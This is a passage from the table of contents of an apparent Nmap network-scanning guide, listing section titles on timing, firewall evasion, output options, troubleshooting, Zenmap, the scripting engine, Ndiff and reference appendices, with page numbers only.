Minimum Host Group Size .................................................................. 103
Maximum Host Group Size ................................................................. 104
Initial RTT Timeout ............................................................................. 105
Maximum RTT Timeout ...................................................................... 106
Maximum Retries ................................................................................ 107
Set the Packet TTL ............................................................................... 108
Host Timeout ...................................................................................... 109
Minimum Scan Delay .......................................................................... 110
Maximum Scan Delay .......................................................................... 111
Minimum Packet Rate ......................................................................... 112
Maximum Packet Rate ........................................................................ 113
Defeat Reset Rate Limits ..................................................................... 114
10
Section 8: Evading Firewalls .............................................................. 115
Firewall Evasion Techniques Overview ............................................... 116
Fragment Packets ............................................................................... 117
Specify a Specific MTU ....................................................................... 118
Use a Decoy ........................................................................................ 119
Idle Zombie Scan ................................................................................ 120
Manually Specify a Source Port Number ............................................ 121
Append Random Data ........................................................................ 122
Randomize Target Scan Order ............................................................ 123
Spoof MAC Address ............................................................................ 124
Send Bad Checksums .......................................................................... 125
Section 9: Output Options ................................................................ 127
Output Options Overview .................................................................. 128
Save Output to a Text File................................................................... 129
Save Output to a XML File .................................................................. 130
Grepable Output ................................................................................ 131
Output All Supported File Types......................................................... 132
Display Scan Statistics ......................................................................... 133
133t Output ........................................................................................ 134
Section 10: Troubleshooting and Debugging ...................................... 135
Troubleshooting and Debugging Overview ........................................ 136
Getting Help ....................................................................................... 137
Display Nmap Version ......................................................................... 138
Verbose Output .................................................................................. 139
Debugging .......................................................................................... 140
Display Port State Reason Codes ........................................................ 141
Only Display Open Ports ..................................................................... 142
Trace Packets ...................................................................................... 143
Display Host Networking Configuration ............................................. 144
Specify Which Network Interface to Use ........................................... 145
11
Section 11: Zenmap .......................................................................... 147
Zenmap Overview ............................................................................... 148
Launching Zenmap .............................................................................. 149
Basic Zenmap Operations ................................................................... 150
Zenmap Results ................................................................................... 151
Scanning Profiles ................................................................................. 152
Profile Editor ....................................................................................... 153
Viewing Open Ports ............................................................................ 154
Viewing a Network Map ..................................................................... 155
Saving Network Maps ......................................................................... 156
Viewing Host Details ........................................................................... 157
Viewing Scan History .......................................................................... 158
Comparing Scan Results ...................................................................... 159
Saving Scans ........................................................................................ 160
Section 12: Nmap Scripting Engine (NSE)........................................... 161
Nmap Scripting Engine Overview........................................................ 162
Execute Individual Scripts ................................................................... 163
Execute Multiple Scripts ..................................................................... 164
Script Categories ................................................................................. 165
Execute Scripts by Category ................................................................ 166
Execute Multiple Script Categories ..................................................... 167
Troubleshoot Scripts ........................................................................... 168
Update the Script Database ................................................................ 169
Section 13: Ndiff .............................................................................. 171
Ndiff Overview .................................................................................... 172
Scan Comparison Using Ndiff .............................................................. 173
Ndiff Verbose Mode ............................................................................ 174
XML Output Mode .............................................................................. 175
Section 14: Tips and Tricks ................................................................ 177
Tips and Tricks Overview .................................................................... 178
12
Combine Multiple Options ................................................................. 179
Scan Using Interactive Mode .............................................................. 180
Runtime Interaction ........................................................................... 181
Remotely Scan Your Network ............................................................. 182
Wireshark ........................................................................................... 183
Scanme.Insecure.org .......................................................................... 184
Nmap Online Resources ..................................................................... 185
Appendix A - Nmap Cheat Sheet ....................................................... 187
Appendix B - Nmap Port States ......................................................... 191
Appendix C - CIDR Cross Reference ................................................... 193
Appendix D - Common TCP/IP Ports .................................................. 195